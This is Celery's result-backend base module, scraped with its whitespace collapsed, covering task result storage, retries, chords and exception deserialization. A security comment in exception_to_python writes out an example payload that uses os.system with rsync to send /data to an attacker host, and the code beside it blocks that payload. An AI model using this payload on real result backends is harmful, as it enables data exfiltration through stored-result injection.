"""Result backend base classes.- :class:`BaseBackend` defines the interface.- :class:`KeyValueStoreBackend` is a common base class using K/V semantics like _get and _put."""importsysimporttimeimportwarningsfromcollectionsimportnamedtuplefromdatetimeimporttimedeltafromfunctoolsimportpartialfromweakrefimportWeakValueDictionaryfrombilliard.einfoimportExceptionInfofromkombu.serializationimportdumps,loads,prepare_accept_contentfromkombu.serializationimportregistryasserializer_registryfromkombu.utils.encodingimportbytes_to_str,ensure_bytesfromkombu.utils.urlimportmaybe_sanitize_urlimportcelery.exceptionsfromceleryimportcurrent_app,group,maybe_signature,statesfromcelery._stateimportget_current_taskfromcelery.app.taskimportContextfromcelery.exceptionsimport(BackendGetMetaError,BackendStoreError,ChordError,ImproperlyConfigured,NotRegistered,SecurityError,TaskRevokedError,TimeoutError)fromcelery.resultimportGroupResult,ResultBase,ResultSet,allow_join_result,result_from_tuplefromcelery.utils.collectionsimportBufferMapfromcelery.utils.functionalimportLRUCache,arity_greaterfromcelery.utils.logimportget_loggerfromcelery.utils.serializationimport(create_exception_cls,ensure_serializable,get_pickleable_exception,get_pickled_exception,raise_with_context)fromcelery.utils.timeimportget_exponential_backoff_interval__all__=('BaseBackend','KeyValueStoreBackend','DisabledBackend')EXCEPTION_ABLE_CODECS=frozenset({'pickle'})logger=get_logger(__name__)MESSAGE_BUFFER_MAX=8192pending_results_t=namedtuple('pending_results_t',('concrete','weak',))E_NO_BACKEND="""No result backend is configured.Please see the documentation for more information."""E_CHORD_NO_BACKEND="""Starting chords requires a result backend to be configured.Note that a group chained with a task is also upgraded to be a chord,as this pattern requires synchronization.Result backends that supports chords: Redis, Database, Memcached, and more."""defunpickle_backend(cls,args,kwargs):"""Return an unpickled backend."""returncls(*args,app=current_app._get_current_object(),**kwargs)class_nulldict(dict):defignore(self,*a,**kw):pass__setitem__=update=setdefault=ignoredef_is_request_ignore_result(request):ifrequestisNone:returnFalsereturnrequest.ignore_resultclassBackend:READY_STATES=states.READY_STATESUNREADY_STATES=states.UNREADY_STATESEXCEPTION_STATES=states.EXCEPTION_STATESTimeoutError=TimeoutError#: Time to sleep between polling each individual item#: in `ResultSet.iterate`. as opposed to the `interval`#: argument which is for each pass.subpolling_interval=None#: If true the backend must implement :meth:`get_many`.supports_native_join=False#: If true the backend must automatically expire results.#: The daily backend_cleanup periodic task won't be triggered#: in this case.supports_autoexpire=False#: Set to true if the backend is persistent by default.persistent=Trueretry_policy={'max_retries':20,'interval_start':0,'interval_step':1,'interval_max':1,}def__init__(self,app,serializer=None,max_cached_results=None,accept=None,expires=None,expires_type=None,url=None,**kwargs):self.app=appconf=self.app.confself.serializer=serializerorconf.result_serializer(self.content_type,self.content_encoding,self.encoder)=serializer_registry._encoders[self.serializer]cmax=max_cached_resultsorconf.result_cache_maxself._cache=_nulldict()ifcmax==-1elseLRUCache(limit=cmax)self.expires=self.prepare_expires(expires,expires_type)# precedence: accept, conf.result_accept_content, conf.accept_contentself.accept=conf.result_accept_contentifacceptisNoneelseacceptself.accept=conf.accept_contentifself.acceptisNoneelseself.acceptself.accept=prepare_accept_content(self.accept)self.always_retry=conf.get('result_backend_always_retry',False)self.max_sleep_between_retries_ms=conf.get('result_backend_max_sleep_between_retries_ms',10000)self.base_sleep_between_retries_ms=conf.get('result_backend_base_sleep_between_retries_ms',10)self.max_retries=conf.get('result_backend_max_retries',float("inf"))self.thread_safe=conf.get('result_backend_thread_safe',False)self._pending_results=pending_results_t({},WeakValueDictionary())self._pending_messages=BufferMap(MESSAGE_BUFFER_MAX)self.url=urldefas_uri(self,include_password=False):"""Return the backend as an URI, sanitizing the password or not."""# when using maybe_sanitize_url(), "/" is added# we're stripping it for consistencyifinclude_password:returnself.urlurl=maybe_sanitize_url(self.urlor'')returnurl[:-1]ifurl.endswith(':///')elseurldefmark_as_started(self,task_id,**meta):"""Mark a task as started."""returnself.store_result(task_id,meta,states.STARTED)defmark_as_done(self,task_id,result,request=None,store_result=True,state=states.SUCCESS):"""Mark task as successfully executed."""if(store_resultandnot_is_request_ignore_result(request)):self.store_result(task_id,result,state,request=request)ifrequestandrequest.chord:self.on_chord_part_return(request,state,result)defmark_as_failure(self,task_id,exc,traceback=None,request=None,store_result=True,call_errbacks=True,state=states.FAILURE):"""Mark task as executed with failure."""ifstore_result:self.store_result(task_id,exc,state,traceback=traceback,request=request)ifrequest:# This task may be part of a chordifrequest.chord:self.on_chord_part_return(request,state,exc)# It might also have chained tasks which need to be propagated to,# this is most likely to be exclusive with being a direct part of a# chord but we'll handle both cases separately.## The `chain_data` try block here is a bit tortured since we might# have non-iterable objects here in tests and it's easier this way.try:chain_data=iter(request.chain)except(AttributeError,TypeError):chain_data=tuple()forchain_eleminchain_data:# Reconstruct a `Context` object for the chained task which has# enough information to for backends to work withchain_elem_ctx=Context(chain_elem)chain_elem_ctx.update(chain_elem_ctx.options)chain_elem_ctx.id=chain_elem_ctx.options.get('task_id')chain_elem_ctx.group=chain_elem_ctx.options.get('group_id')# If the state should be propagated, we'll do so for all# elements of the chain. This is only truly important so# that the last chain element which controls completion of# the chain itself is marked as completed to avoid stalls.## Some chained elements may be complex signatures and have no# task ID of their own, so we skip them hoping that not# descending through them is OK. If the last chain element is# complex, we assume it must have been uplifted to a chord by# the canvas code and therefore the condition below will ensure# that we mark something as being complete as avoid stalling.if(store_resultandstateinstates.PROPAGATE_STATESandchain_elem_ctx.task_idisnotNone):self.store_result(chain_elem_ctx.task_id,exc,state,traceback=traceback,request=chain_elem_ctx,)# If the chain element is a member of a chord, we also need# to call `on_chord_part_return()` as well to avoid stalls.if'chord'inchain_elem_ctx.options:self.on_chord_part_return(chain_elem_ctx,state,exc)# And finally we'll fire any errbacksifcall_errbacksandrequest.errbacks:self._call_task_errbacks(request,exc,traceback)def_call_task_errbacks(self,request,exc,traceback):old_signature=[]forerrbackinrequest.errbacks:errback=self.app.signature(errback)ifnoterrback._app:# Ensure all signatures have an applicationerrback._app=self.apptry:if(# Celery tasks type created with the @task decorator have# the __header__ property, but Celery task created from# Task class do not have this property.# That's why we have to check if this property exists# before checking is it partial function.hasattr(errback.type,'__header__')and# workaround to support tasks with bind=True executed as# link errors. Otherwise, retries can't be usednotisinstance(errback.type.__header__,partial)andarity_greater(errback.type.__header__,1)):errback(request,exc,traceback)else:old_signature.append(errback)exceptNotRegistered:# Task may not be present in this worker.# We simply send it forward for another worker to consume.# If the task is not registered there, the worker will raise# NotRegistered.old_signature.append(errback)ifold_signature:# Previously errback was called as a task so we still# need to do so if the errback only takes a single task_id arg.task_id=request.idroot_id=request.root_idortask_idg=group(old_signature,app=self.app)ifself.app.conf.task_always_eagerorrequest.delivery_info.get('is_eager',False):g.apply((task_id,),parent_id=task_id,root_id=root_id)else:g.apply_async((task_id,),parent_id=task_id,root_id=root_id)defmark_as_revoked(self,task_id,reason='',request=None,store_result=True,state=states.REVOKED):exc=TaskRevokedError(reason)ifstore_result:self.store_result(task_id,exc,state,traceback=None,request=request)ifrequestandrequest.chord:self.on_chord_part_return(request,state,exc)defmark_as_retry(self,task_id,exc,traceback=None,request=None,store_result=True,state=states.RETRY):"""Mark task as being retries. Note: Stores the current exception (if any). """returnself.store_result(task_id,exc,state,traceback=traceback,request=request)defchord_error_from_stack(self,callback,exc=None):app=self.apptry:backend=app._tasks[callback.task].backendexceptKeyError:backend=self# We have to make a fake request since either the callback failed or# we're pretending it did since we don't have information about the# chord part(s) which failed. This request is constructed as a best# effort for new style errbacks and may be slightly misleading about# what really went wrong, but at least we call them!fake_request=Context({"id":callback.options.get("task_id"),"errbacks":callback.options.get("link_error",[]),"delivery_info":dict(),**callback})try:self._call_task_errbacks(fake_request,exc,None)exceptExceptionaseb_exc:# pylint: disable=broad-exceptreturnbackend.fail_from_current_stack(callback.id,exc=eb_exc)else:returnbackend.fail_from_current_stack(callback.id,exc=exc)deffail_from_current_stack(self,task_id,exc=None):type_,real_exc,tb=sys.exc_info()try:exc=real_excifexcisNoneelseexcexception_info=ExceptionInfo((type_,exc,tb))self.mark_as_failure(task_id,exc,exception_info.traceback)returnexception_infofinally:whiletbisnotNone:try:tb.tb_frame.clear()tb.tb_frame.f_localsexceptRuntimeError:# Ignore the exception raised if the frame is still executing.passtb=tb.tb_nextdeltbdefprepare_exception(self,exc,serializer=None):"""Prepare exception for serialization."""serializer=self.serializerifserializerisNoneelseserializerifserializerinEXCEPTION_ABLE_CODECS:returnget_pickleable_exception(exc)exctype=type(exc)return{'exc_type':getattr(exctype,'__qualname__',exctype.__name__),'exc_message':ensure_serializable(exc.args,self.encode),'exc_module':exctype.__module__}defexception_to_python(self,exc):"""Convert serialized exception to Python exception."""ifnotexc:returnNoneelifisinstance(exc,BaseException):ifself.serializerinEXCEPTION_ABLE_CODECS:exc=get_pickled_exception(exc)returnexcelifnotisinstance(exc,dict):try:exc=dict(exc)exceptTypeErrorase:raiseTypeError(f"If the stored exception isn't an "f"instance of "f"BaseException, it must be a dictionary.\n"f"Instead got: {exc}")fromeexc_module=exc.get('exc_module')try:exc_type=exc['exc_type']exceptKeyErrorase:raiseValueError("Exception information must include ""the exception type")fromeifexc_moduleisNone:cls=create_exception_cls(exc_type,__name__)else:try:# Load module and find exception class in thatcls=sys.modules[exc_module]# The type can contain qualified name with parent classesfornameinexc_type.split('.'):cls=getattr(cls,name)except(KeyError,AttributeError):cls=create_exception_cls(exc_type,celery.exceptions.__name__)exc_msg=exc.get('exc_message','')# If the recreated exception type isn't indeed an exception,# this is a security issue. Without the condition below, an attacker# could exploit a stored command vulnerability to execute arbitrary# python code such as:# os.system("rsync /data attacker@192.168.56.100:~/data")# The attacker sets the task's result to a failure in the result# backend with the os as the module, the system function as the# exception type and the payload# rsync /data attacker@192.168.56.100:~/data# as the exception arguments like so:# {# "exc_module": "os",# "exc_type": "system",# "exc_message": "rsync /data attacker@192.168.56.100:~/data"# }ifnotisinstance(cls,type)ornotissubclass(cls,BaseException):fake_exc_type=exc_typeifexc_moduleisNoneelsef'{exc_module}.{exc_type}'raiseSecurityError(f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")# XXX: Without verifying `cls` is actually an exception class,# an attacker could execute arbitrary python code.# cls could be anything, even eval().try:ifisinstance(exc_msg,(tuple,list)):exc=cls(*exc_msg)else:exc=cls(exc_msg)exceptExceptionaserr:# noqaexc=Exception(f'{cls}({exc_msg})')returnexcdefprepare_value(self,result):"""Prepare value for storage."""ifself.serializer!='pickle'andisinstance(result,ResultBase):returnresult.as_tuple()returnresultdefencode(self,data):_,_,payload=self._encode(data)returnpayloaddef_encode(self,data):returndumps(data,serializer=self.serializer)defmeta_from_decoded(self,meta):ifmeta['status']inself.EXCEPTION_STATES:meta['result']=self.exception_to_python(meta['result'])returnmetadefdecode_result(self,payload):returnself.meta_from_decoded(self.decode(payload))defdecode(self,payload):ifpayloadisNone:returnpayloadpayload=payloadorstr(payload)returnloads(payload,content_type=self.content_type,content_encoding=self.content_encoding,accept=self.accept)defprepare_expires(self,value,type=None):ifvalueisNone:value=self.app.conf.result_expiresifisinstance(value,timedelta):value=value.total_seconds()ifvalueisnotNoneandtype:returntype(value)returnvaluedefprepare_persistent(self,enabled=None):ifenabledisnotNone:returnenabledpersistent=self.app.conf.result_persistentreturnself.persistentifpersistentisNoneelsepersistentdefencode_result(self,result,state):ifstateinself.EXCEPTION_STATESandisinstance(result,Exception):returnself.prepare_exception(result)returnself.prepare_value(result)defis_cached(self,task_id):returntask_idinself._cachedef_get_result_meta(self,result,state,traceback,request,format_date=True,encode=False):ifstateinself.READY_STATES:date_done=self.app.now()ifformat_date:date_done=date_done.isoformat()else:date_done=Nonemeta={'status':state,'result':result,'traceback':traceback,'children':self.current_task_children(request),'date_done':date_done,}ifrequestandgetattr(request,'group',None):meta['group_id']=request.groupifrequestandgetattr(request,'parent_id',None):meta['parent_id']=request.parent_idifself.app.conf.find_value_for_key('extended','result'):ifrequest:request_meta={'name':getattr(request,'task',None),'args':getattr(request,'args',None),'kwargs':getattr(request,'kwargs',None),'worker':getattr(request,'hostname',None),'retries':getattr(request,'retries',None),'queue':request.delivery_info.get('routing_key')ifhasattr(request,'delivery_info')andrequest.delivery_infoelseNone,}ifgetattr(request,'stamps',None):request_meta['stamped_headers']=request.stamped_headersrequest_meta.update(request.stamps)ifencode:# args and kwargs need to be encoded properly before savingencode_needed_fields={"args","kwargs"}forfieldinencode_needed_fields:value=request_meta[field]encoded_value=self.encode(value)request_meta[field]=ensure_bytes(encoded_value)meta.update(request_meta)returnmetadef_sleep(self,amount):time.sleep(amount)defstore_result(self,task_id,result,state,traceback=None,request=None,**kwargs):"""Update task state and result. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. """result=self.encode_result(result,state)retries=0whileTrue:try:self._store_result(task_id,result,state,traceback,request=request,**kwargs)returnresultexceptExceptionasexc:ifself.always_retryandself.exception_safe_to_retry(exc):ifretries<self.max_retries:retries+=1# get_exponential_backoff_interval computes integers# and time.sleep accept floats for sub second sleepsleep_amount=get_exponential_backoff_interval(self.base_sleep_between_retries_ms,retries,self.max_sleep_between_retries_ms,True)/1000self._sleep(sleep_amount)else:raise_with_context(BackendStoreError("failed to store result on the backend",task_id=task_id,state=state),)else:raisedefforget(self,task_id):self._cache.pop(task_id,None)self._forget(task_id)def_forget(self,task_id):raiseNotImplementedError('backend does not implement forget.')defget_state(self,task_id):"""Get the state of a task."""returnself.get_task_meta(task_id)['status']get_status=get_state# XXX compatdefget_traceback(self,task_id):"""Get the traceback for a failed task."""returnself.get_task_meta(task_id).get('traceback')defget_result(self,task_id):"""Get the result of a task."""returnself.get_task_meta(task_id).get('result')defget_children(self,task_id):"""Get the list of subtasks sent by a task."""try:returnself.get_task_meta(task_id)['children']exceptKeyError:passdef_ensure_not_eager(self):ifself.app.conf.task_always_eagerandnotself.app.conf.task_store_eager_result:warnings.warn("Results are not stored in backend and should not be retrieved when ""task_always_eager is enabled, unless task_store_eager_result is enabled.",RuntimeWarning)defexception_safe_to_retry(self,exc):"""Check if an exception is safe to retry. Backends have to overload this method with correct predicates dealing with their exceptions. By default no exception is safe to retry, it's up to backend implementation to define which exceptions are safe. """returnFalsedefget_task_meta(self,task_id,cache=True):"""Get task meta from backend. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. """self._ensure_not_eager()ifcache:try:returnself._cache[task_id]exceptKeyError:passretries=0whileTrue:try:meta=self._get_task_meta_for(task_id)breakexceptExceptionasexc:ifself.always_retryandself.exception_safe_to_retry(exc):ifretries<self.max_retries:retries+=1# get_exponential_backoff_interval computes integers# and time.sleep accept floats for sub second sleepsleep_amount=get_exponential_backoff_interval(self.base_sleep_between_retries_ms,retries,self.max_sleep_between_retries_ms,True)/1000self._sleep(sleep_amount)else:raise_with_context(BackendGetMetaError("failed to get meta",task_id=task_id),)else:raiseifcacheandmeta.get('status')==states.SUCCESS:self._cache[task_id]=metareturnmetadefreload_task_result(self,task_id):"""Reload task result, even if it has been previously fetched."""self._cache[task_id]=self.get_task_meta(task_id,cache=False)defreload_group_result(self,group_id):"""Reload group result, even if it has been previously fetched."""self._cache[group_id]=self.get_group_meta(group_id,cache=False)defget_group_meta(self,group_id,cache=True):self._ensure_not_eager()ifcache:try:returnself._cache[group_id]exceptKeyError:passmeta=self._restore_group(group_id)ifcacheandmetaisnotNone:self._cache[group_id]=metareturnmetadefrestore_group(self,group_id,cache=True):"""Get the result for a group."""meta=self.get_group_meta(group_id,cache=cache)ifmeta:returnmeta['result']defsave_group(self,group_id,result):"""Store the result of an executed group."""returnself._save_group(group_id,result)defdelete_group(self,group_id):self._cache.pop(group_id,None)returnself._delete_group(group_id)defcleanup(self):"""Backend cleanup."""defprocess_cleanup(self):"""Cleanup actions to do at the end of a task worker process."""defon_task_call(self,producer,task_id):return{}defadd_to_chord(self,chord_id,result):raiseNotImplementedError('Backend does not support add_to_chord')defon_chord_part_return(self,request,state,result,**kwargs):passdefset_chord_size(self,group_id,chord_size):passdeffallback_chord_unlock(self,header_result,body,countdown=1,**kwargs):kwargs['result']=[r.as_tuple()forrinheader_result]try:body_type=getattr(body,'type',None)exceptNotRegistered:body_type=Nonequeue=body.options.get('queue',getattr(body_type,'queue',None))ifqueueisNone:# fallback to default routing if queue name was not# explicitly passed to body callbackqueue=self.app.amqp.router.route(kwargs,body.name)['queue'].namepriority=body.options.get('priority',getattr(body_type,'priority',0))self.app.tasks['celery.chord_unlock'].apply_async((header_result.id,body,),kwargs,countdown=countdown,queue=queue,priority=priority,)defensure_chords_allowed(self):passdefapply_chord(self,header_result_args,body,**kwargs):self.ensure_chords_allowed()header_result=self.app.GroupResult(*header_result_args)self.fallback_chord_unlock(header_result,body,**kwargs)defcurrent_task_children(self,request=None):request=requestorgetattr(get_current_task(),'request',None)ifrequest:return[r.as_tuple()forringetattr(request,'children',[])]def__reduce__(self,args=(),kwargs=None):kwargs={}ifnotkwargselsekwargsreturn(unpickle_backend,(self.__class__,args,kwargs))classSyncBackendMixin:defiter_native(self,result,timeout=None,interval=0.5,no_ack=True,on_message=None,on_interval=None):self._ensure_not_eager()results=result.resultsifnotresults:returntask_ids=set()forresultinresults:ifisinstance(result,ResultSet):yieldresult.id,result.resultselse:task_ids.add(result.id)yield fromself.get_many(task_ids,timeout=timeout,interval=interval,no_ack=no_ack,on_message=on_message,on_interval=on_interval,)defwait_for_pending(self,result,timeout=None,interval=0.5,no_ack=True,on_message=None,on_interval=None,callback=None,propagate=True):self._ensure_not_eager()ifon_messageisnotNone:raiseImproperlyConfigured('Backend does not support on_message callback')meta=self.wait_for(result.id,timeout=timeout,interval=interval,on_interval=on_interval,no_ack=no_ack,)ifmeta:result._maybe_set_cache(meta)returnresult.maybe_throw(propagate=propagate,callback=callback)defwait_for(self,task_id,timeout=None,interval=0.5,no_ack=True,on_interval=None):"""Wait for task and return its result. If the task raises an exception, this exception will be re-raised by :func:`wait_for`. Raises: celery.exceptions.TimeoutError: If `timeout` is not :const:`None`, and the operation takes longer than `timeout` seconds. """self._ensure_not_eager()time_elapsed=0.0while1:meta=self.get_task_meta(task_id)ifmeta['status']instates.READY_STATES:returnmetaifon_interval:on_interval()# avoid hammering the CPU checking status.time.sleep(interval)time_elapsed+=intervaliftimeoutandtime_elapsed>=timeout:raiseTimeoutError('The operation timed out.')defadd_pending_result(self,result,weak=False):returnresultdefremove_pending_result(self,result):returnresult@propertydefis_async(self):returnFalse
[文档]classBaseBackend(Backend,SyncBackendMixin):"""Base (synchronous) result backend."""
BaseDictBackend=BaseBackend# XXX compatclassBaseKeyValueStoreBackend(Backend):key_t=ensure_bytestask_keyprefix='celery-task-meta-'group_keyprefix='celery-taskset-meta-'chord_keyprefix='chord-unlock-'implements_incr=Falsedef__init__(self,*args,**kwargs):ifhasattr(self.key_t,'__func__'):# pragma: no coverself.key_t=self.key_t.__func__# remove bindingsuper().__init__(*args,**kwargs)self._add_global_keyprefix()self._encode_prefixes()ifself.implements_incr:self.apply_chord=self._apply_chord_incrdef_add_global_keyprefix(self):""" This method prepends the global keyprefix to the existing keyprefixes. This method checks if a global keyprefix is configured in `result_backend_transport_options` using the `global_keyprefix` key. If so, then it is prepended to the task, group and chord key prefixes. """global_keyprefix=self.app.conf.get('result_backend_transport_options',{}).get("global_keyprefix",None)ifglobal_keyprefix:ifglobal_keyprefix[-1]notin':_-.':global_keyprefix+='_'self.task_keyprefix=f"{global_keyprefix}{self.task_keyprefix}"self.group_keyprefix=f"{global_keyprefix}{self.group_keyprefix}"self.chord_keyprefix=f"{global_keyprefix}{self.chord_keyprefix}"def_encode_prefixes(self):self.task_keyprefix=self.key_t(self.task_keyprefix)self.group_keyprefix=self.key_t(self.group_keyprefix)self.chord_keyprefix=self.key_t(self.chord_keyprefix)defget(self,key):raiseNotImplementedError('Must implement the get method.')defmget(self,keys):raiseNotImplementedError('Does not support get_many')def_set_with_state(self,key,value,state):returnself.set(key,value)defset(self,key,value):raiseNotImplementedError('Must implement the set method.')defdelete(self,key):raiseNotImplementedError('Must implement the delete method')defincr(self,key):raiseNotImplementedError('Does not implement incr')defexpire(self,key,value):passdefget_key_for_task(self,task_id,key=''):"""Get the cache key for a task by id."""ifnottask_id:raiseValueError(f'task_id must not be empty. Got {task_id} instead.')returnself._get_key_for(self.task_keyprefix,task_id,key)defget_key_for_group(self,group_id,key=''):"""Get the cache key for a group by id."""ifnotgroup_id:raiseValueError(f'group_id must not be empty. Got {group_id} instead.')returnself._get_key_for(self.group_keyprefix,group_id,key)defget_key_for_chord(self,group_id,key=''):"""Get the cache key for the chord waiting on group with given id."""ifnotgroup_id:raiseValueError(f'group_id must not be empty. Got {group_id} instead.')returnself._get_key_for(self.chord_keyprefix,group_id,key)def_get_key_for(self,prefix,id,key=''):key_t=self.key_treturnkey_t('').join([prefix,key_t(id),key_t(key),])def_strip_prefix(self,key):"""Take bytes: emit string."""key=self.key_t(key)forprefixinself.task_keyprefix,self.group_keyprefix:ifkey.startswith(prefix):returnbytes_to_str(key[len(prefix):])returnbytes_to_str(key)def_filter_ready(self,values,READY_STATES=states.READY_STATES):fork,valueinvalues:ifvalueisnotNone:value=self.decode_result(value)ifvalue['status']inREADY_STATES:yieldk,valuedef_mget_to_results(self,values,keys,READY_STATES=states.READY_STATES):ifhasattr(values,'items'):# client returns dict so mapping preserved.return{self._strip_prefix(k):vfork,vinself._filter_ready(values.items(),READY_STATES)}else:# client returns list so need to recreate mapping.return{bytes_to_str(keys[i]):vfori,vinself._filter_ready(enumerate(values),READY_STATES)}defget_many(self,task_ids,timeout=None,interval=0.5,no_ack=True,on_message=None,on_interval=None,max_iterations=None,READY_STATES=states.READY_STATES):interval=0.5ifintervalisNoneelseintervalids=task_idsifisinstance(task_ids,set)elseset(task_ids)cached_ids=set()cache=self._cachefortask_idinids:try:cached=cache[task_id]exceptKeyError:passelse:ifcached['status']inREADY_STATES:yieldbytes_to_str(task_id),cachedcached_ids.add(task_id)ids.difference_update(cached_ids)iterations=0whileids:keys=list(ids)r=self._mget_to_results(self.mget([self.get_key_for_task(k)forkinkeys]),keys,READY_STATES)cache.update(r)ids.difference_update({bytes_to_str(v)forvinr})forkey,valueinr.items():ifon_messageisnotNone:on_message(value)yieldbytes_to_str(key),valueiftimeoutanditerations*interval>=timeout:raiseTimeoutError(f'Operation timed out ({timeout})')ifon_interval:on_interval()time.sleep(interval)# don't busy loop.iterations+=1ifmax_iterationsanditerations>=max_iterations:breakdef_forget(self,task_id):self.delete(self.get_key_for_task(task_id))def_store_result(self,task_id,result,state,traceback=None,request=None,**kwargs):meta=self._get_result_meta(result=result,state=state,traceback=traceback,request=request)meta['task_id']=bytes_to_str(task_id)# Retrieve metadata from the backend, if the status# is a success then we ignore any following update to the state.# This solves a task deduplication issue because of network# partitioning or lost workers. This issue involved a race condition# making a lost task overwrite the last successful result in the# result backend.current_meta=self._get_task_meta_for(task_id)ifcurrent_meta['status']==states.SUCCESS:returnresulttry:self._set_with_state(self.get_key_for_task(task_id),self.encode(meta),state)exceptBackendStoreErrorasex:raiseBackendStoreError(str(ex),state=state,task_id=task_id)fromexreturnresultdef_save_group(self,group_id,result):self._set_with_state(self.get_key_for_group(group_id),self.encode({'result':result.as_tuple()}),states.SUCCESS)returnresultdef_delete_group(self,group_id):self.delete(self.get_key_for_group(group_id))def_get_task_meta_for(self,task_id):"""Get task meta-data for a task by id."""meta=self.get(self.get_key_for_task(task_id))ifnotmeta:return{'status':states.PENDING,'result':None}returnself.decode_result(meta)def_restore_group(self,group_id):"""Get task meta-data for a task by id."""meta=self.get(self.get_key_for_group(group_id))# previously this was always pickled, but later this# was extended to support other serializers, so the# structure is kind of weird.ifmeta:meta=self.decode(meta)result=meta['result']meta['result']=result_from_tuple(result,self.app)returnmetadef_apply_chord_incr(self,header_result_args,body,**kwargs):self.ensure_chords_allowed()header_result=self.app.GroupResult(*header_result_args)header_result.save(backend=self)defon_chord_part_return(self,request,state,result,**kwargs):ifnotself.implements_incr:returnapp=self.appgid=request.groupifnotgid:returnkey=self.get_key_for_chord(gid)try:deps=GroupResult.restore(gid,backend=self)exceptExceptionasexc:# pylint: disable=broad-exceptcallback=maybe_signature(request.chord,app=app)logger.exception('Chord %r raised: %r',gid,exc)returnself.chord_error_from_stack(callback,ChordError(f'Cannot restore group: {exc!r}'),)ifdepsisNone:try:raiseValueError(gid)exceptValueErrorasexc:callback=maybe_signature(request.chord,app=app)logger.exception('Chord callback %r raised: %r',gid,exc)returnself.chord_error_from_stack(callback,ChordError(f'GroupResult {gid} no longer exists'),)val=self.incr(key)# Set the chord size to the value defined in the request, or fall back# to the number of dependencies we can see from the restored resultsize=request.chord.get("chord_size")ifsizeisNone:size=len(deps)ifval>size:# pragma: no coverlogger.warning('Chord counter incremented too many times for %r',gid)elifval==size:callback=maybe_signature(request.chord,app=app)j=deps.join_nativeifdeps.supports_native_joinelsedeps.jointry:withallow_join_result():ret=j(timeout=app.conf.result_chord_join_timeout,propagate=True)exceptExceptionasexc:# pylint: disable=broad-excepttry:culprit=next(deps._failed_join_report())reason='Dependency {0.id} raised {1!r}'.format(culprit,exc,)exceptStopIteration:reason=repr(exc)logger.exception('Chord %r raised: %r',gid,reason)self.chord_error_from_stack(callback,ChordError(reason))else:try:callback.delay(ret)exceptExceptionasexc:# pylint: disable=broad-exceptlogger.exception('Chord %r raised: %r',gid,exc)self.chord_error_from_stack(callback,ChordError(f'Callback error: {exc!r}'),)finally:deps.delete()self.delete(key)else:self.expire(key,self.expires)
[文档]classKeyValueStoreBackend(BaseKeyValueStoreBackend,SyncBackendMixin):"""Result backend base class for key/value stores."""
[文档]classDisabledBackend(BaseBackend):"""Dummy result backend."""_cache={}# need this attribute to reset cache in tests.